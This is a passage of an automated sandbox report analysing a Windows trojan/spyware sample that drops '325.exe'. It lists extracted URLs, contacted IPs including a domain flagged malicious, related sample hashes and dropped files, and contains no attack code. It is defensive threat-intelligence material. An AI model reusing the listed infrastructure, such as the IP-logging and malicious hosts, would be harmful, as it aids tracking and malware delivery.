                                                                                                                  http://www.sakkal.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://ipinfo.io/ip%appdata%325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.fontbureau.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://iplogger.org/1Spbs7ekS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sectigo.com/CPS0kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://api.ip.sb325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://helpx.ad325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                                                                                high
                                                                                                                                http://ahkscript.orgCouldkS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown

                                                                                                                                Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                212.224.105.105
                                                                                                                                yspasenana.xyzGermany
                                                                                                                                44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                                                                                104.192.141.1
                                                                                                                                bitbucket.orgUnited States
                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                104.25.234.53
                                                                                                                                is.gdUnited States
                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                88.99.66.31
                                                                                                                                iplogger.orgGermany
                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                52.217.201.169
                                                                                                                                s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                16509AMAZON-02USfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                Analysis ID:452457
                                                                                                                                Start date:22.07.2021
                                                                                                                                Start time:11:42:10
                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                Overall analysis duration:0h 10m 35s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Sample file name:kS2dqbsDwD (renamed file extension from none to exe)
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • HDC enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@5/29@9/5
                                                                                                                                EGA Information:Failed
                                                                                                                                HDC Information:
                                                                                                                                • Successful, ratio: 2% (good quality ratio 0.9%)
                                                                                                                                • Quality average: 31.8%
                                                                                                                                • Quality standard deviation: 39.8%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 83%
                                                                                                                                • Number of executed functions: 46
                                                                                                                                • Number of non-executed functions: 214
                                                                                                                                Cookbook Comments:
                                                                                                                                • Adjust boot time
                                                                                                                                • Enable AMSI
                                                                                                                                Warnings:
                                                                                                                                Show All
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.193.48, 13.64.90.137, 20.82.210.154, 23.211.4.86, 52.255.188.83, 40.112.88.60, 13.88.21.125, 20.82.209.183, 80.67.82.235, 80.67.82.211, 104.26.12.31, 104.26.13.31, 172.67.75.172, 20.49.157.6
                                                                                                                                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                11:42:57API Interceptor1x Sleep call for process: kS2dqbsDwD.exe modified
                                                                                                                                11:44:07API Interceptor46x Sleep call for process: 325.exe modified

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                212.224.105.105Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                • yspasenana.xyz/
                                                                                                                                104.192.141.1Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                    P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                      lpaBPnb1OB.exeGet hashmaliciousBrowse
                                                                                                                                        2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                          EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                            etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                              kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                  JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                    pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                      AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                        YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                          8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                            k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                              kvAgGyJqYT.exeGet hashmaliciousBrowse
                                                                                                                                                                A7DmPhc0bs.exeGet hashmaliciousBrowse
                                                                                                                                                                  Coupon-Codes-2021.docGet hashmaliciousBrowse
                                                                                                                                                                    k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                      q7jxy6gZMb.exeGet hashmaliciousBrowse
                                                                                                                                                                        104.25.234.53Pdf Document.exeGet hashmaliciousBrowse
                                                                                                                                                                        • is.gd/TGKGYYYYZ

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        bitbucket.orgNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        HryPYPQtcg.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        oOoVvuAQS9.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        6FORhr7lC1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        kvAgGyJqYT.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        I2VQzf34i3.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        A7DmPhc0bs.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        Coupon-Codes-2021.docGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        yspasenana.xyzNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.105
                                                                                                                                                                        s3-w.us-east-1.amazonaws.comNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.94.27
                                                                                                                                                                        Machine Service.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.249.124
                                                                                                                                                                        Machine Service.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.102.108
                                                                                                                                                                        #Ud83d#Udd0ajs_msg_ 3pm.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.11.68
                                                                                                                                                                        HryPYPQtcg.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.129.57
                                                                                                                                                                        6FORhr7lC1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.202.41
                                                                                                                                                                        2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.162.201
                                                                                                                                                                        EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.161.9
                                                                                                                                                                        etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.80.164
                                                                                                                                                                        kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.128.43
                                                                                                                                                                        9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.137.244
                                                                                                                                                                        JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.130.249
                                                                                                                                                                        pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.104.164
                                                                                                                                                                        AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.90.84
                                                                                                                                                                        YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.171.179
                                                                                                                                                                        8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.140.209
                                                                                                                                                                        k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.101.132
                                                                                                                                                                        I2VQzf34i3.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.83.220
                                                                                                                                                                        k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.10.252
                                                                                                                                                                        D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.164.225

                                                                                                                                                                        ASN

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        CLOUDFLARENETUSNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.25.233.53
                                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.14.85
                                                                                                                                                                        #U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.72.95
                                                                                                                                                                        10303640_APMC-TRN-C0001-Stability_Calculation_Rev1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.18.7.156
                                                                                                                                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.51.99
                                                                                                                                                                        Westernunionreceipt711 ___vaw.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.40.98
                                                                                                                                                                        MPU702734-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.13.164
                                                                                                                                                                        XuQRPW44hiGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.58.112
                                                                                                                                                                        Remittance.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                        jRPSjUSf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.23.98.190
                                                                                                                                                                        989E2813477A4245E0357E0F8E49AFAE384AF828C95EE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.71.170
                                                                                                                                                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        ruoMVmVwPu.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.130.27
                                                                                                                                                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        rxfttQnoO5Get hashmaliciousBrowse
                                                                                                                                                                        • 1.13.147.24
                                                                                                                                                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.72.95
                                                                                                                                                                        Cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.36.131
                                                                                                                                                                        aviso de pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.39.75
                                                                                                                                                                        GHK2s5apNB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.130.27
                                                                                                                                                                        kRGc0HgN5b.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                        DE-FIRSTCOLOwwwfirst-colonetDENb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.105
                                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        Px9H2c5Uo4.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.80
                                                                                                                                                                        eBjKjtQjDN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        ruoMVmVwPu.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        GHK2s5apNB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        m8TJbe5yP6.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.312.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        SecuriteInfo.com.Variant.Cerbu.108262.10538.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        d9MvOgFpyI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        0832946463ff710ff7f783ce24756f455a843852b0b96.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 46975986.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        PO 97179275.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 46975986.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        PO 97179275.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        what_is_a_xydhias_agreement.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
                                                                                                                                                                        what_is_a_xydhias_agreement.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
                                                                                                                                                                        no_response_will_be_considered_as_agreement_email.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
                                                                                                                                                                        AMAZON-02USNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.216.94.27
                                                                                                                                                                        ovLjmo5UoEGet hashmaliciousBrowse
                                                                                                                                                                        • 63.34.62.30
                                                                                                                                                                        o3ZUDIEL1vGet hashmaliciousBrowse
                                                                                                                                                                        • 18.151.13.78
                                                                                                                                                                        D1dU3jQ1IIGet hashmaliciousBrowse
                                                                                                                                                                        • 34.208.242.240
                                                                                                                                                                        mal.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.58.78.16
                                                                                                                                                                        vjsBNwolo9.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 76.223.26.96
                                                                                                                                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.135.113
                                                                                                                                                                        A7X93JRxhpGet hashmaliciousBrowse
                                                                                                                                                                        • 54.151.74.14
                                                                                                                                                                        1Ds9g7CEspGet hashmaliciousBrowse
                                                                                                                                                                        • 13.208.189.104
                                                                                                                                                                        XuQRPW44hiGet hashmaliciousBrowse
                                                                                                                                                                        • 54.228.23.118
                                                                                                                                                                        Taf5zLti30Get hashmaliciousBrowse
                                                                                                                                                                        • 44.231.84.110
                                                                                                                                                                        5qpsqg7U0GGet hashmaliciousBrowse
                                                                                                                                                                        • 34.219.219.82
                                                                                                                                                                        LyxN1ckWTWGet hashmaliciousBrowse
                                                                                                                                                                        • 18.139.244.68
                                                                                                                                                                        ZlvFNj.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 3.16.22.120
                                                                                                                                                                        U4r9W64doyGet hashmaliciousBrowse
                                                                                                                                                                        • 13.245.89.196
                                                                                                                                                                        C4PozjQdGEGet hashmaliciousBrowse
                                                                                                                                                                        • 18.135.214.121
                                                                                                                                                                        kb5IbEJU8cGet hashmaliciousBrowse
                                                                                                                                                                        • 18.227.43.189
                                                                                                                                                                        MD5OxTSc6iGet hashmaliciousBrowse
                                                                                                                                                                        • 18.149.163.217
                                                                                                                                                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 52.217.198.209
                                                                                                                                                                        c51w5YSYdOGet hashmaliciousBrowse
                                                                                                                                                                        • 108.146.155.164

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        #U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        41609787.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        B5xK9XEvzO.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        RsEvjI1iTt.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        ORD.pptGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        39pfFwU3Ns.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        47a8af.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        Comprobante1.vbsGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        ZlvFNj.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        QT2kxM315B.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        Convert HEX uit phishing mail.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        192-3216-Us.gt.com.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        N41101255652.vbsGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        FILE_2932NH_9923.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        RDlkHCLRxE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31
                                                                                                                                                                        Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        • 52.217.201.169
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        • 88.99.66.31

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        C:\Users\user\AppData\Roaming\325.exeNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                          P58w6OezJY.exeGet hashmaliciousBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\325.exe.log
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                            Entropy (8bit):5.355304211458859
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2299.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                            Entropy (8bit):0.6970840431455908
                                                                                                                                                                            Encrypted:false
